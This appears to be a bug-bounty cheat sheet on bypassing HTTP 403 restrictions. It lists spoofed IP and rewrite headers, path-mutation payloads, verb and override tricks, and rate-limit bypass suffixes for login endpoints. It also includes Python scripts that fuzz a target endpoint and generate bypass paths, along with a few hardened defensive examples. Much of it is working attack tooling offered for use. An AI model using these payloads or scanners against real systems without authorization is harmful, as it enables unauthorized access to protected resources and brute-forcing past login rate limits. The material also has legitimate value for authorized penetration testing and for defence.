403 Bypass
My Tool : https://github.com/ROOTBABU/4-ZERO-3
Background reading on how a server ends up answering 403 and how the restriction was bypassed:
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html
https://book.hacktricks.xyz/pentesting/pentesting-web/403-and-401-bypasses
https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://hackerone.com/reports/1011767
https://infosecwriteups.com/importance-of-burp-history-analysis-to-bypass-403-afc7af6c08b
https://www.zapstiko.com/403-forbidden-bypass-technique/
https://medium.com/r3d-buck3t/bypass-ip-restrictions-with-burp-suite-fb4c72ec8e9c
https://kathan19.gitbook.io/howtohunt/rate-limit/ratelimitbypass
https://news.ycombinator.com/item?id=26688390
https://pentesttools.net/403bypasser-burpsuite-extension-to-bypass-403-restricted-directory/
https://www.hahwul.com/2021/10/08/bypass-403/
https://blog.intigriti.com/2020/02/24/twitter-recap-1-bug-bounty-tips-by-the-intigriti-community/
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema
https://sapt.medium.com/bypassing-403-protection-to-get-pagespeed-admin-access-822fab64c0b3
https://github.com/devploit/dontgo403
https://github.com/yunemse48/403bypasser
https://github.com/vavkamil/XFFenum
https://github.com/ivan-sincek/forbidden
https://github.com/Dheerajmadhukar/4-ZERO-3/blob/main/403-bypass.sh
X-Forwarded-For is the header most often abused here: researchers use it to inject SQL payloads (where the value is logged or stored), enumerate intermediate proxies, spoof the client IP and reach SSRF-style internal targets. Example values:
X-Forwarded-For: 127.0.0.1:80
X-Forwarded-For: 2001:db8:85a3:8d3:1319:8a2e:370:7348
X-Forwarded-For: 203.0.113.195
X-Forwarded-For: 203.0.113.195, 70.41.3.18, 150.172.238.178
Other non-standard forms:
# Used for some Google services
X-ProxyUser-Ip: 203.0.113.19
403 tool for one endpoint:
Different verbs: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK, TRACK, LOCK, UPDATE
The tool can't show the response of every request, so it compares each response with a normal (baseline) request: status code, Content-Length, response time and any unique value in the body. A response that differs from the baseline is shown as !Alert.
Analyse the response headers too; CORS headers reveal custom headers the application accepts, which are worth adding to the request, e.g.:
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Use X-HTTP-Method-Override: PUT to override the verb; do the same for every verb in the list.
Change the Host header: the proxy server's IP address, any other address or range identified during enumeration, localhost in its different forms, temporary hosts.
Try to use other User Agents to access the resource.
Send a request with an X-Rewrite-Url header pointing to a non-existing resource; if the status changes (e.g. 404 instead of 403) the backend honours the header and it can be pointed at the protected path:
X-Rewrite-Url
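The comparison loop described above, as an added example in Python (not the 4-ZERO-3 script or any of the tools listed on this page): it generates the verb, method-override, IP-spoofing, URL-rewrite and Host variations for one endpoint, sends each one without following redirects, and flags any response whose status, Content-Length or timing differs from a baseline GET. The header names and values are the ones from this page; the 3x timing threshold, the target URL and the `extra_hosts` parameter are assumptions.

```python
import sys
import time
import urllib.error
import urllib.request
from dataclasses import dataclass
from itertools import product

# Header names and values from this page's lists.
IP_HEADERS = [
    "X-Forwarded-For", "X-Forwarded", "Forwarded-For", "X-Remote-IP",
    "X-Remote-Addr", "X-Originating-IP", "X-Client-IP", "X-Real-IP",
    "True-Client-IP", "Cluster-Client-IP", "Client-IP", "X-ProxyUser-Ip",
    "X-Custom-IP-Authorization", "CF-Connecting-IP",
]
IP_VALUES = ["127.0.0.1", "127.0.0.1:80", "localhost", "::1",
             "10.0.0.1", "172.16.0.1", "192.168.0.1", "169.254.1.1"]
VERBS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE",
         "PATCH", "INVENTED"]
REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
HOSTS = ["localhost", "127.0.0.1"]


@dataclass(frozen=True)
class Candidate:
    method: str
    path: str
    headers: tuple  # sorted (name, value) pairs, so equal candidates compare equal


def _cand(method, path, headers):
    return Candidate(method, path, tuple(sorted(headers.items())))


def generate_candidates(path, extra_hosts=()):
    """Return the de-duplicated list of request variations to try against path."""
    cands = [_cand(v, path, {}) for v in VERBS]                                   # plain verbs
    cands += [_cand("GET", path, {"X-HTTP-Method-Override": v}) for v in VERBS]   # override header
    cands += [_cand("GET", path, {h: ip}) for h, ip in product(IP_HEADERS, IP_VALUES)]
    cands += [_cand("GET", "/", {h: path}) for h in REWRITE_HEADERS]              # ask for /, name the real path
    cands += [_cand("GET", path, {"Host": h}) for h in (*HOSTS, *extra_hosts)]
    seen = set()
    return [c for c in cands if not (c in seen or seen.add(c))]


@dataclass
class Observation:
    status: int
    length: int
    elapsed: float


def differs_from_baseline(base, obs, time_factor=3.0):
    """Reason string when obs differs materially from base, else None.
    Status is the strongest signal; a body-length change with the same status
    usually means a different error page; a large timing change hints at a
    different code path (assumed threshold: time_factor x baseline)."""
    if obs.status != base.status:
        return f"status {base.status} -> {obs.status}"
    if obs.length != base.length:
        return f"content-length {base.length} -> {obs.length}"
    if base.elapsed > 0 and obs.elapsed > base.elapsed * time_factor:
        return f"response time {base.elapsed:.2f}s -> {obs.elapsed:.2f}s"
    return None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # A 302 to /login is itself a signal, so never follow redirects.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def send_request(base_url, cand, timeout=10):
    """Send one candidate and record status, body length and elapsed time."""
    req = urllib.request.Request(base_url.rstrip("/") + cand.path, method=cand.method)
    for name, value in cand.headers:
        req.add_unredirected_header(name, value)   # lets us override Host too
    t0 = time.monotonic()
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as e:             # 4xx/5xx (and unfollowed 3xx)
        status, body = e.code, e.read()
    return Observation(status, len(body), time.monotonic() - t0)


def scan(base_url, path):
    """Baseline the endpoint, then report every candidate that looks different."""
    baseline = send_request(base_url, _cand("GET", path, {}))
    print(f"baseline GET {path}: {baseline.status} len={baseline.length}")
    hits = []
    for cand in generate_candidates(path):
        obs = send_request(base_url, cand)
        reason = differs_from_baseline(baseline, obs)
        if reason:
            hits.append((cand, reason))
            print(f"!Alert {cand.method} {cand.path} {dict(cand.headers)}: {reason}")
    return hits


if __name__ == "__main__":
    scan(sys.argv[1], sys.argv[2])   # e.g. python3 fuzz403.py https://target.example /admin
```

Duplicate headers (the empty-then-value X-Forwarded-For trick) are not expressible with urllib's header dict; send those by hand or from Burp. A hit is only a lead: confirm it by checking that the 200 body is really the protected content and not a generic page of the same length.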
IP-spoofing headers to try:
X-Forwarded-For
X-Forward-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Client-IP
X-Real-IP
Values to put in them:
127.0.0.1 (or anything in the 127.0.0.0/8 or ::1/128 address spaces)
localhost
Any RFC1918 address:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
Link local addresses:
169.254.0.0/16
Note: Including a port element along with the address or hostname may also help bypass edge protections such as web application firewalls, etc. For example: 127.0.0.4:80, 127.0.0.4:443, 127.0.0.4:43982
Examples (see https://hackerone.com/reports/1011767):
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
Host: localhost
Remote_Addr: 127.0.0.1
Content-Length: 0
X-Forwarded-For: A, B, C (a proxy chain: the last entry is the hop nearest the server, which traverses the list in reverse; also try the same address repeated, e.g. X-Forwarded-For: 68.180.194.242, 68.180.194.242, 68.180.194.242, 68.180.194.242, and every address or range found during enumeration, e.g. 192.168.0.0-192.168.255.255)
Full header list to fuzz (supply a value from the list above, or a path for the URL headers):
X-Real-IP, X-Forwarded, Forwarded-For, X-Host, X-Forwarded-IP, X-Client, X-Client-IP, X-Remote-Addr, X-ProxyUser-Ip, X-Original-URL, Client-IP, True-Client-IP, Cluster-Client-IP, X-Originally-Forwarded-For, X-Originating-IP, X-Arbitrary, X-HTTP-DestinationURL, X-Forwarded-Proto, CF-Connecting_IP, CF-Connecting-IP, X-Custom-IP-Authorization, X-Forwarded-For, X-Remote-IP, X-Forwarded-Host, X-Rewrite-URL, Content-Length, Base-Url, Http-Url, Proxy-Host, Proxy-Url, Real-Ip, X-Forward-For, X-Forwarded-By, X-Forwarded-For-Original, X-Forwarded-Server, X-Forwarder-For, X-Http-Destinationurl, X-Http-Host-Override, X-Original-Remote-Addr, X-Proxy-Url, Destination, Proxy
If the path is protected you can try to bypass the path protection using these other headers (https://hackerone.com/reports/737323): request an unprotected path such as / and name the protected one in the header:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
# or send the X-Forwarded-For header twice, the first one empty
X-Forwarded-For:
X-Forwarded-For: IP
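Why the spoofed values above work, shown as an added example (not from this page or any project it references): a client-IP lookup that trusts the left-most X-Forwarded-For entry, beside one that only accepts the header when the TCP peer is a trusted proxy and then walks the chain from the right. The trusted-proxy range, the admin allowlist and the sample requests are constructed assumptions.

```python
import ipaddress

# Assumptions for the example: our own edge proxies live in 10.0.0.0/8 and only
# they may append to X-Forwarded-For; /admin is allowed from these networks.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ADMIN_NETWORKS = [ipaddress.ip_network("127.0.0.0/8"),
                  ipaddress.ip_network("192.168.0.0/16")]


def _in(networks, value):
    """True if value parses as an IP address inside one of networks.
    '127.0.0.1:80' or 'localhost' do not parse and are never trusted."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return False
    return any(addr in net for net in networks)


def client_ip_vulnerable(headers, remote_addr):
    """Takes the left-most X-Forwarded-For entry, i.e. whatever the client wrote."""
    xff = headers.get("X-Forwarded-For", "")
    return xff.split(",")[0].strip() or remote_addr


def client_ip_hardened(headers, remote_addr):
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies, then
    walk the chain from the right and return the first hop that is not a trusted
    proxy.  Entries a client prepended on the left are never reached."""
    if not _in(TRUSTED_PROXIES, remote_addr):
        return remote_addr                      # direct connection: header is untrusted
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _in(TRUSTED_PROXIES, hop):
            return hop
    return remote_addr                          # header missing or only proxies listed


def admin_allowed(resolver, headers, remote_addr):
    """Allow /admin when the resolved client IP is inside ADMIN_NETWORKS."""
    return _in(ADMIN_NETWORKS, resolver(headers, remote_addr))


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}   # constructed attacker request
    for resolver in (client_ip_vulnerable, client_ip_hardened):
        print(resolver.__name__, "->", resolver(spoof, "203.0.113.7"),
              "admin:", admin_allowed(resolver, spoof, "203.0.113.7"))
```

The same rule applies to every alias in the header list above (X-Real-IP, True-Client-IP, CF-Connecting-IP and so on): the application should read exactly one header, the one its own edge proxy overwrites, and ignore the rest.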
Path Fuzzing
Other path bypasses:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
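An added Python example (not part of this page or the 4-ZERO-3 script) that generates the path variants listed above for any path, plus the percent-encoded and double-encoded forms that belong under the URL Encode Bypass category noted at the end of the page. Output is one variant per line so it can feed ffuf or the scanner as a wordlist; the extra trailing %20/%09/%00 and %2e/ variants are additions beyond the list above.

```python
import sys


def _split(path):
    """'/admin/console' -> ('/admin/', 'console'): mutations target the last segment."""
    head, _, last = path.rstrip("/").rpartition("/")
    return head + "/", last


def encoding_variants(segment):
    """Percent-encoded forms of one segment: the whole segment encoded, each
    character encoded in turn, and each character double-encoded (%25XX)."""
    out = {"".join(f"%{ord(c):02X}" for c in segment)}
    for i, c in enumerate(segment):
        enc = f"%{ord(c):02X}"
        out.add(segment[:i] + enc + segment[i + 1:])
        out.add(segment[:i] + "%25" + enc[1:] + segment[i + 1:])
    return sorted(out)


def path_mutations(path):
    """Return the de-duplicated list of path variants to request instead of path."""
    head, last = _split(path)
    parent = head.rstrip("/")            # '' for a top-level path
    variants = [
        head + last.upper(),             # /SECRET          case-insensitive backend
        head + last + "/",               # /secret/         trailing slash
        head + last + "/.",              # /secret/.        dot segment
        parent + "//" + last + "//",     # //secret//       doubled slashes
        head + "./" + last + "/..",      # /./secret/..     dot segments normalised later
        head + ";/" + last,              # /;/secret        path parameter
        head + ".;/" + last,             # /.;/secret       Tomcat-style path parameter
        parent + "//;//" + last,         # //;//secret
        head + last + ".json",           # /secret.json     format suffix (ruby)
        head + last + "%20",             # trailing encoded space, tab, NUL
        head + last + "%09",
        head + last + "%00",
        head + "%2e/" + last,            # /%2e/secret      encoded dot segment
    ]
    variants += [head + v for v in encoding_variants(last)]
    seen = set()
    return [v for v in variants if not (v in seen or seen.add(v))]


if __name__ == "__main__":
    # One per line, e.g. python3 pathmut.py /secret > paths.txt; ffuf -w paths.txt -u https://site.com/FUZZ
    print("\n".join(path_mutations(sys.argv[1] if len(sys.argv) > 1 else "/secret")))
```

Because the variants differ in how the front-end and the back-end normalise the path, compare each result against a baseline exactly as for the header fuzzing: a 200 with a different Content-Length is the signal, not the 200 alone.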
Change the protocol: from http to https, or from https to http
Use every known subdomain in the Referer header to bypass, as in https://infosecwriteups.com/importance-of-burp-history-analysis-to-bypass-403-afc7af6c08b:
ffuf -c -w words.txt -H "Referer: othersubdomain.target.com" https://somethingelse.target.com/FUZZ
Script payloads use $1 for HOSTNAME and $2 for PATH.
Enumeration (what the techniques above depend on):
Identify whether intermediate proxies are present: collect subdomains (from the original website and the Wayback Machine), resolve their IP addresses and ranges, check which addresses are live, which act as proxies and which are reachable only from specific servers, then enumerate endpoints, directories (dirsearch), .bak files and Wayback URLs. Those addresses and ranges are the values to feed into the spoofing headers and the Host header.
Github tools:
Different IP addresses in the X-Forwarded-For header: https://github.com/infosec-au/enumXFF
https://github.com/lobuhi/byp4xx
https://github.com/iamj0ker/bypass-403
https://github.com/gotr00t0day/forbiddenpass
IP Rotate Burp extension: https://github.com/PortSwigger/ip-rotate
https://github.com/devploit/dontgo403
https://github.com/yunemse48/403bypasser
https://github.com/vavkamil/XFFenum
https://github.com/ivan-sincek/forbidden
https://github.com/Dheerajmadhukar/4-ZERO-3/blob/main/403-bypass.sh
Rate Limit Bypass using Special Characters
Adding a null byte (%00) at the end of the email can sometimes bypass the rate limit.
Try adding a space character after the email (not encoded).
Some common characters that help bypass rate limits: %0d, %2e, %09, %20, %0, %00, %0d%0a, %0a, %0C
Adding a slash (/) at the end of the API endpoint can also bypass the rate limit:
domain.com/v1/login->domain.com/v1/login/
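An added example (not from this page) of why those suffixes work: a rate limiter keyed on the raw email or path, beside one keyed on a canonical form. The limiter itself, the limit of 5 and the canonicalisation rules are assumptions for illustration; a real limiter also keys on the client IP and expires its counters.

```python
from collections import defaultdict
from urllib.parse import unquote


class RateLimiter:
    """Counts attempts per key; allow() returns False once a key exceeds limit."""

    def __init__(self, limit, key_fn):
        self.limit, self.key_fn = limit, key_fn
        self.counts = defaultdict(int)

    def allow(self, identifier):
        key = self.key_fn(identifier)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def raw_key(value):
    """Vulnerable: 'victim@example.com' and 'victim@example.com%00' are different keys."""
    return value


def canonical_key(value):
    """Hardened: percent-decode twice (catches double encoding), drop control and
    whitespace characters, lower-case, and strip trailing '.' and '/'."""
    v = unquote(unquote(value))
    v = "".join(ch for ch in v if ch.isprintable() and not ch.isspace())
    v = v.lower()
    return v.rstrip("./") or v


# The suffix tricks from the notes above, applied in rotation.
SUFFIXES = ["", "%00", " ", "%0d", "%2e", "%09", "%20", "%0d%0a", "%0a", "%0C", "/"]


def attempts_until_blocked(limiter, base, max_attempts=200):
    """Submit base with each suffix in turn; return how many attempts were
    accepted before the limiter first refused one."""
    allowed = 0
    for i in range(max_attempts):
        if not limiter.allow(base + SUFFIXES[i % len(SUFFIXES)]):
            return allowed
        allowed += 1
    return allowed


if __name__ == "__main__":
    target = "victim@example.com"   # constructed sample identifier
    print("raw key:      ", attempts_until_blocked(RateLimiter(5, raw_key), target))
    print("canonical key:", attempts_until_blocked(RateLimiter(5, canonical_key), target))
```

With the raw key every suffix opens a fresh counter, so the attacker gets 11 x 5 attempts before the first refusal; with the canonical key all variants collapse onto one counter and the sixth attempt is refused. The same canonicalisation should run before the password check, otherwise the variants are rejected as unknown users and the attacker simply learns nothing either way.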
403-bypass techniques covered by the script:
Changing HTTP header values: ip = localhost, 127.0.0.1, 127.0.0.1:port (a port element may also help bypass edge protections such as web application firewalls, e.g. 127.0.0.4:80, 127.0.0.4:443, 127.0.0.4:43982)
URL Encode Bypass